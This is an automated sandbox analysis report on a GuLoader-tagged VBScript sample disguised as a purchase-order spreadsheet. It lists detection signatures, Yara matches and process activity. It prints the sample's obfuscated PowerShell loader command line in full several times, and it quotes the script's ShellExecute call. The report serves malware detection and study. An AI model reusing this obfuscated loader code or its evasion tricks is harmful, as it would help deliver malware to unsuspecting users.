Windows Analysis Report
PO-09784893 xlsx.vbs

Overview

General Information

Sample Name:	PO-09784893 xlsx.vbs
Analysis ID:	755440
MD5:	bfa859d9ad7b23d3606ea13f525065a7
SHA1:	a1b3e395dc20bcdaa866b953a08a48d0079bace2
SHA256:	ec51e9ad23c469e82059bd497873749017e80e136053a25c7a752ffa18bf2002
Tags:	GuLoadervbs
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Sigma detected: Dot net compiler compiles file from suspicious location

VBScript performs obfuscated calls to suspicious functions

Potential evasive VBS script found (use of timer() function in loop)

Obfuscated command line found

Wscript starts Powershell (via cmd or directly)

Potential malicious VBS script found (suspicious strings)

Very long command line found

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Java / VBScript file with very long strings (likely obfuscated code)

Drops PE files

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Detected potential crypto function

Compiles C# or VB.Net code

Found dropped PE file which has not been started or loaded

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Enables debug privileges

Classification

Signatures

Source:

Binary string: ek8C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.pdb source: powershell.exe, 00000003.00000002.848043775.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp

Source: powershell.exe, 00000003.00000002.836596796.0000000002CE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.861091835.0000000007940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft.co
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.838609935.00000000047F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku	Jump to behavior

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: lysreklamerne.ShellExecute Blindtabletter, " " & chrw(34) & ap6 & chrw(34), "", "", 0

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5576
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5576			Jump to behavior

Yara signature match

Source: PO-09784893 xlsx.vbs, type: SAMPLE	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_4180.amsi.csv, type: OTHER	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Java / VBScript file with very long strings (likely obfuscated code)

Source: PO-09784893 xlsx.vbs

Initial sample: Strings found which are bigger than 50

Detected potential crypto function

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_078135D8	3_2_078135D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_07810040	3_2_07810040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_078135CB	3_2_078135CB

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP"	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_01

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_daxdyhsl.wnc.ps1

Jump to behavior

Source: classification engine

Classification label: mal84.expl.evad.winVBS@11/9@0/0

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

